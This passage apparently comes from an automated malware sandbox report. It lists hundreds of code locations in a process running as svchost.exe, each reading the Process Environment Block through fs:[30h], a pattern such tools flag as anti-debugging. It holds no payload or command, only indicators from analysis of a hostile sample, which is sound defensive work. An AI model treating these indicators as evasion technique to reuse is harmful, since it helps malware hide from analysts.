            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0362A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036380E9 mov eax, dword ptr fs:[00000030h]2_2_036380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B60E0 mov eax, dword ptr fs:[00000030h]2_2_036B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C0F0 mov eax, dword ptr fs:[00000030h]2_2_0362C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036720F0 mov ecx, dword ptr fs:[00000030h]2_2_036720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B20DE mov eax, dword ptr fs:[00000030h]2_2_036B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036280A0 mov eax, dword ptr fs:[00000030h]2_2_036280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C80A8 mov eax, dword ptr fs:[00000030h]2_2_036C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F60B8 mov eax, dword ptr fs:[00000030h]2_2_036F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F60B8 mov ecx, dword ptr fs:[00000030h]2_2_036F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363208A mov eax, dword ptr fs:[00000030h]2_2_0363208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638770 mov eax, dword ptr fs:[00000030h]2_2_03638770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov esi, dword ptr fs:[00000030h]2_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov eax, dword ptr fs:[00000030h]2_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov eax, dword ptr fs:[00000030h]2_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630750 mov eax, dword ptr fs:[00000030h]2_2_03630750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE75D mov eax, dword ptr fs:[00000030h]2_2_036BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672750 mov eax, dword ptr fs:[00000030h]2_2_03672750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672750 mov eax, dword ptr fs:[00000030h]2_2_03672750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4755 mov eax, dword ptr fs:[00000030h]2_2_036B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C720 mov eax, dword ptr fs:[00000030h]2_2_0366C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C720 mov eax, dword ptr fs:[00000030h]2_2_0366C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov eax, dword ptr fs:[00000030h]2_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov ecx, dword ptr fs:[00000030h]2_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov eax, dword ptr fs:[00000030h]2_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AC730 mov eax, dword ptr fs:[00000030h]2_2_036AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C700 mov eax, dword ptr fs:[00000030h]2_2_0366C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630710 mov eax, dword ptr fs:[00000030h]2_2_03630710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660710 mov eax, dword ptr fs:[00000030h]2_2_03660710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE7E1 mov eax, dword ptr fs:[00000030h]2_2_036BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036347FB mov eax, dword ptr fs:[00000030h]2_2_036347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036347FB mov eax, dword ptr fs:[00000030h]2_2_036347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363C7C0 mov eax, dword ptr fs:[00000030h]2_2_0363C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B07C3 mov eax, dword ptr fs:[00000030h]2_2_036B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036307AF mov eax, dword ptr fs:[00000030h]2_2_036307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E47A0 mov eax, dword ptr fs:[00000030h]2_2_036E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D678E mov eax, dword ptr fs:[00000030h]2_2_036D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F866E mov eax, dword ptr fs:[00000030h]2_2_036F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F866E mov eax, dword ptr fs:[00000030h]2_2_036F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A660 mov eax, dword ptr fs:[00000030h]2_2_0366A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A660 mov eax, dword ptr fs:[00000030h]2_2_0366A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03662674 mov eax, dword ptr fs:[00000030h]2_2_03662674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364C640 mov eax, dword ptr fs:[00000030h]2_2_0364C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E627 mov eax, dword ptr fs:[00000030h]2_2_0364E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03666620 mov eax, dword ptr fs:[00000030h]2_2_03666620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668620 mov eax, dword ptr fs:[00000030h]2_2_03668620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363262C mov eax, dword ptr fs:[00000030h]2_2_0363262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE609 mov eax, dword ptr fs:[00000030h]2_2_036AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672619 mov eax, dword ptr fs:[00000030h]2_2_03672619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B06F1 mov eax, dword ptr fs:[00000030h]2_2_036B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B06F1 mov eax, dword ptr fs:[00000030h]2_2_036B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0366A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A6C7 mov eax, dword ptr fs:[00000030h]2_2_0366A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C6A6 mov eax, dword ptr fs:[00000030h]2_2_0366C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036666B0 mov eax, dword ptr fs:[00000030h]2_2_036666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634690 mov eax, dword ptr fs:[00000030h]2_2_03634690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634690 mov eax, dword ptr fs:[00000030h]2_2_03634690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638550 mov eax, dword ptr fs:[00000030h]2_2_03638550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638550 mov eax, dword ptr fs:[00000030h]2_2_03638550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6500 mov eax, dword ptr fs:[00000030h]2_2_036C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036325E0 mov eax, dword ptr fs:[00000030h]2_2_036325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C5ED mov eax, dword ptr fs:[00000030h]2_2_0366C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C5ED mov eax, dword ptr fs:[00000030h]2_2_0366C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E5CF mov eax, dword ptr fs:[00000030h]2_2_0366E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E5CF mov eax, dword ptr fs:[00000030h]2_2_0366E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036365D0 mov eax, dword ptr fs:[00000030h]2_2_036365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A5D0 mov eax, dword ptr fs:[00000030h]2_2_0366A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A5D0 mov eax, dword ptr fs:[00000030h]2_2_0366A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]2_2_036B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]2_2_036B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]2_2_036B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036545B1 mov eax, dword ptr fs:[00000030h]2_2_036545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036545B1 mov eax, dword ptr fs:[00000030h]2_2_036545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632582 mov eax, dword ptr fs:[00000030h]2_2_03632582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632582 mov ecx, dword ptr fs:[00000030h]2_2_03632582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03664588 mov eax, dword ptr fs:[00000030h]2_2_03664588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E59C mov eax, dword ptr fs:[00000030h]2_2_0366E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BC460 mov ecx, dword ptr fs:[00000030h]2_2_036BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]2_2_0365A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]2_2_0365A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]2_2_0365A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA456 mov eax, dword ptr fs:[00000030h]2_2_036EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362645D mov eax, dword ptr fs:[00000030h]2_2_0362645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365245A mov eax, dword ptr fs:[00000030h]2_2_0365245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]2_2_0362E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]2_2_0362E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]2_2_0362E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C427 mov eax, dword ptr fs:[00000030h]2_2_0362C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A430 mov eax, dword ptr fs:[00000030h]2_2_0366A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]2_2_03668402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]2_2_03668402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]2_2_03668402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036304E5 mov ecx, dword ptr fs:[00000030h]2_2_036304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036364AB mov eax, dword ptr fs:[00000030h]2_2_036364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036644B0 mov ecx, dword ptr fs:[00000030h]2_2_036644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BA4B0 mov eax, dword ptr fs:[00000030h]2_2_036BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA49A mov eax, dword ptr fs:[00000030h]2_2_036EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362CB7E mov eax, dword ptr fs:[00000030h]2_2_0362CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4B4B mov eax, dword ptr fs:[00000030h]2_2_036E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4B4B mov eax, dword ptr fs:[00000030h]2_2_036E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6B40 mov eax, dword ptr fs:[00000030h]2_2_036C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6B40 mov eax, dword ptr fs:[00000030h]2_2_036C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FAB40 mov eax, dword ptr fs:[00000030h]2_2_036FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D8B42 mov eax, dword ptr fs:[00000030h]2_2_036D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628B50 mov eax, dword ptr fs:[00000030h]2_2_03628B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DEB50 mov eax, dword ptr fs:[00000030h]2_2_036DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EB20 mov eax, dword ptr fs:[00000030h]2_2_0365EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EB20 mov eax, dword ptr fs:[00000030h]2_2_0365EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F8B28 mov eax, dword ptr fs:[00000030h]2_2_036F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F8B28 mov eax, dword ptr fs:[00000030h]2_2_036F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704B00 mov eax, dword ptr fs:[00000030h]2_2_03704B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]2_2_03638BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]2_2_03638BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]2_2_03638BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EBFC mov eax, dword ptr fs:[00000030h]2_2_0365EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BCBF0 mov eax, dword ptr fs:[00000030h]2_2_036BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]2_2_03650BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]2_2_03650BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]2_2_03650BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]2_2_03630BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]2_2_03630BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]2_2_03630BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DEBD0 mov eax, dword ptr fs:[00000030h]2_2_036DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640BBE mov eax, dword ptr fs:[00000030h]2_2_03640BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640BBE mov eax, dword ptr fs:[00000030h]2_2_03640BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4BB0 mov eax, dword ptr fs:[00000030h]2_2_036E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4BB0 mov eax, dword ptr fs:[00000030h]2_2_036E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h]2_2_0366CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h]2_2_0366CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h]2_2_0366CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DEA60 mov eax, dword ptr fs:[00000030h]2_2_036DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036ACA72 mov eax, dword ptr fs:[00000030h]2_2_036ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036ACA72 mov eax, dword ptr fs:[00000030h]2_2_036ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
